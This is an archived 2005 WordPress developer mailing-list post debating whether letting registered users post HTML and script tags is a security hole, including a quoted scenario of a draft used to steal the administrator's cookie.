[wp-hackers] Security Vulnerability found - Forum Pos
amit at igeek.info
Wed Apr 13 17:42:28 GMT 2005
"Mike Little" <journalized at gmail.com>
> In my opinion, this isn't as much of a threat to WordPress as it
> In essence, the 'exploit' is that a registered user with posting
iframe be visible in any readers browser!
> That's right. It's a blogging system. It's a simplified CMS. It would
be a pretty poor one without HTML.
> In other words if you trust someone, including yourself, to post
stories on your blog then you have to trust that they won't do anything
> I don't see that that is any different from any situation where you
allow someone trusted to put content on your site.
That's correct & I support it. If you don't trust anyone, then don't give them the rights to POST. Its as simple as that!!
"John Sinteur" <john at sinteur.com>
> Consider this scenario:
> on a weblog, "options - general" the owner has checked: "anyone can
> in "options - writing" the owner has checked "Newly registered members:
> May submit drafts for review" (or worse "May publish articles" but
> let's forget about that for now)
> attempts to steal the admin cookie.
> Owner logs on, sees a new draft, clicks on it to view, and has just
> lost his weblog.
I'd say, if you want anyone to register & post on your blog, then there should be an option to disable the <script> tags etc. But disabling them by default & not having the option to enable them will be very restricting.
|| Canned!! -- my Atropine || iG:Syntax Hiliter v2.01 ||
|| iGEEK.INFO || Free Nokia Ringtones || Online Gaming @ Games Planet ||
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the wp-hackers